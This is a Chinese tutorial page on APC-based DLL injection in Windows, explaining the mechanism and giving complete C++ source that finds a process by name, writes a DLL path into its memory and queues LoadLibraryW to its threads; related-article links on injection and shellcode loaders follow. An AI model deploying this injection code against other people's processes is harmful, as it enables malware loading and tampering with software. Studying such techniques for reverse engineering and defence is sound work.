APC注入

APC注入的原理是利用当线程被唤醒时APC中的注册函数会被执行的机制,并以此去执行我们的DLL加载代码,进而完成DLL注入的目的,其具体流程如下:

    1)当EXE里某个线程执行到SleepEx()或者WaitForSingleObjectEx()时,系统就会产生一个软中断(或者是Messagebox弹窗的时候不点OK的时候也能注入)。

    2)当线程再次被唤醒时,此线程会首先执行APC队列中的被注册的函数。

    3)利用QueueUserAPC()这个API可以在软中断时向线程的APC队列插入一个函数指针,如果我们插入的是Loadlibrary()执行函数的话,就能达到注入DLL的目的。

核心函数:

局限:

这种注入方式局限性很明显,一是必须要等待时机,而是当注入成功后,SleepEx或者其他等待函数直接就会跳过当前等待继续往下走,这样可能造成被注入程序的不稳定行,经常导致被注入程序崩溃。

代码:

// LoadExeWin32.cpp : 定义控制台应用程序的入口点。

//

#include "stdafx.h"

#include <string>

#include <windows.h>

#include <shlwapi.h>

#include <tlhelp32.h>

#include <winternl.h>

#pragma comment(lib, "shlwapi.lib")

#pragma comment(lib,"ntdll.lib")

using namespace std;

//根据进程名字获取pid

DWORD GetPidFromName(wstring wsProcessName) {

HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

if (hSnapshot == INVALID_HANDLE_VALUE){

return FALSE;

}

PROCESSENTRY32W pe = {sizeof(pe)};

BOOL bOk;

for (bOk = Process32FirstW(hSnapshot, &pe); bOk; bOk = Process32NextW(hSnapshot, &pe)){

wstring  wsNowProcName = pe.szExeFile;

if(StrStrI(wsNowProcName.c_str() ,wsProcessName.c_str())!= NULL){

CloseHandle(hSnapshot);

return pe.th32ProcessID;

}

}

CloseHandle(hSnapshot);

return 0;

}

//把wcCacheInDllPath DLL文件注入进程wsProcessName

BOOL Injection_APC(const wstring &wsProcessName ,const WCHAR wcCacheInDllPath[]){

//初始化

DWORD dwProcessId  = GetPidFromName(wsProcessName);

HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwProcessId);

if (!hProcess){

return FALSE;

}

PVOID  lpData = VirtualAllocEx(hProcess,

NULL,

1024,

MEM_COMMIT,

PAGE_EXECUTE_READWRITE);

DWORD dwRet;

if (lpData)  {

//在远程进程申请空间中写入待注入DLL的路径

 WriteProcessMemory(hProcess,

lpData,

(LPVOID)wcCacheInDllPath,

MAX_PATH,&dwRet);

}

CloseHandle(hProcess);

//开始注入

THREADENTRY32 te = {sizeof(THREADENTRY32)};

//得到线程快照

HANDLE handleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD ,0);

if (INVALID_HANDLE_VALUE == handleSnap)  {

return FALSE;

}

BOOL bStat = FALSE;

//得到第一个线程

if (Thread32First(handleSnap,&te)){

do {  //进行进程ID对比

if (te.th32OwnerProcessID == dwProcessId)  {

//得到线程句柄

HANDLE handleThread = OpenThread(THREAD_ALL_ACCESS ,FALSE ,te.th32ThreadID);

if (handleThread)  {  //向线程插入APC

DWORD dwRet = QueueUserAPC(

(PAPCFUNC)LoadLibraryW,

handleThread,

(ULONG_PTR)lpData);

if (dwRet > 0)  {

bStat = TRUE;

}

//关闭句柄

CloseHandle(handleThread);

}

}

//循环下一个线程

} while (Thread32Next(handleSnap,&te));

}

CloseHandle(handleSnap);

return bStat;

}

//Adds a user-mode asynchronous procedure call (APC)

int main(int argc, char* argv[]){

//Sleep(1000*100);

Injection_APC(L"Sleep3M.exe" ,L"M.dll");

   return 0;

}

然后写一个测试DLL:

然后再写一个被注入程序:

测试结果:

注入自己的程序成功:

随便尝试了下注入QQ.exe,直接崩溃退出了。

DLL注入-APC注入的更多相关文章

  1. 分析恶意驱动(进程启动apc注入dll)

    一.前言  用IDA也有好些时间了,以前就只会用F5功能玩无壳无保护的裸驱动,感觉太坑了,这两天就开始看网上大牛的逆向. 今天记录一下sudami曾经逆向过的fuck.sys.第一遍自己走的时候漏掉了 ...

  2. Dll注入:Ring3 层 APC注入

    APC,即Asynchronous procedure call,异步程序调用APC注入的原理是:在一个进程中,当一个执行到SleepEx()或者WaitForSingleObjectEx()时,系统 ...

  3. Dll注入技术之APC注入

    APC注入的原理是利用当线程被唤醒时APC中的注册函数会被执行的机制,并以此去执行我们的DLL加载代码,进而完成DLL注入的目的,其具体流程如下:     1)当EXE里某个线程执行到SleepEx( ...

  4. APC注入

    0X01 注入原理 当线程被唤醒时APC中的注册函数会被执行的机制,并依此去调用我们的DLL加载代码,进而完成注入的目的 具体的流程: 1 当EXE里的某个线程执行到sleepEX(),或者waitF ...

  5. 常见注入手法第二讲,APC注入

    常见注入手法第二讲,APC注入 转载注明出处 首先,我们要了解下什么是APC APC 是一个简称,具体名字叫做异步过程调用,我们看下MSDN中的解释,异步过程调用,属于是同步对象中的函数,所以去同步对 ...

  6. 注入理解之APC注入

    近期学习做了一个各种注入的MFC程序,把一些心得和体会每天分享一些 APC(Asynchronous procedure call)异步程序调用,在NT中,有两种类型的APCs:用户模式和内核模式.用 ...

  7. HOOK -- DLL的远程注入技术详解(1)

    DLL的远程注入技术是目前Win32病毒广泛使用的一种技术.使用这种技术的病毒体通常位于一个DLL中,在系统启动的时候,一个EXE程序会将这个DLL加载至某些系统进程(如Explorer.exe)中运 ...

  8. DLL的远程注入技术

    DLL的远程注入技术是目前Win32病毒广泛使用的一种技术.使用这种技术的病毒体通常位于一个DLL中,在系统启动的时候,一个EXE程序会将这个DLL加载至某些系统进程(如Explorer.exe)中运 ...

  9. windows:shellcode 代码远程APC注入和加载

    https://www.cnblogs.com/theseventhson/p/13197776.html  上一章介绍了通用的shellcode加载器,这个加载器自己调用virtualAlloc分配 ...

随机推荐

  1. 部分rpm包总结描述

    acl-2.2.51-15.el7.x86_64 Commands for Manipulating POSIX(可移植操作系统接口 of unix) Access Control Lists.有ge ...

  2. 2020年12月-第02阶段-前端基础-CSS字体样式

    CSS字体样式属性调试工具 应用 使用css字体样式完成对字体的设置 使用css外观属性给页面元素添加样式 1.font字体 1.1 font-size:大小 作用: font-size属性用于设置字 ...

  3. 源码解析之 Mybatis 对 Integer 参数做了什么手脚?

    title: 源码解析之 Mybatis 对 Integer 参数做了什么手脚? date: 2021-03-11 updated: 2021-03-11 categories: Mybatis 源码 ...

  4. 运用arcgis将标签图片(栅格图)转换为shp矢量文件

    最近在做图像分割校正,需要将ecognition分割好的shp文件做优化,但是如果直接对shp文件修改非常不友好,可以先对导出的tif标签图进行修改,然后将修改后的标签图转换为新的shp文件进行输出. ...

  5. 一次线上MySQL主从延迟排查

    今天早上来上班,发现zabbix一直告警主从延迟,mysql slave Seconds_Behind_Master (mysql.slave_status[Seconds_Behind_Master ...

  6. 在 .NET Core 5 中集成 Create React app

    翻译自 Camilo Reyes 2021年2月22日的文章 <Integrate Create React app with .NET Core 5> [1] Camilo Reyes ...

  7. Docker安装完成后启动报错:Failed to start Docker Application Container Engine

    报错如下:显示没有启动 先关闭防火墙:防火墙关闭指令请看  <a href="Linux防火墙篇">https://www.cnblogs.com/szx666/p/1 ...

  8. 【oracle学习笔记01】oracle architecture —— Memory Strucrure

    附图3: granule_size for each components 附图4:

  9. openGL官方Glut库配置教程

    在配置前要先安装好Visual Stdio环境 官方下载网站 注:一台Windows操作系统中可以存在多版本的Visual Stdio,多个版本之间互不干扰但不共享插件库,且高版本向下兼容,因此笔者更 ...

  10. 了解什么是Odoo,为二次开发做准备

    什么是odoo odoo是由python语言开发,XML为模板的一体化业务解决方案系统,主要使用在企业资源规划(ERP)领域,还可以当做CMS系统,快速搭建自己博客.商城...系统 odoo前身是Op ...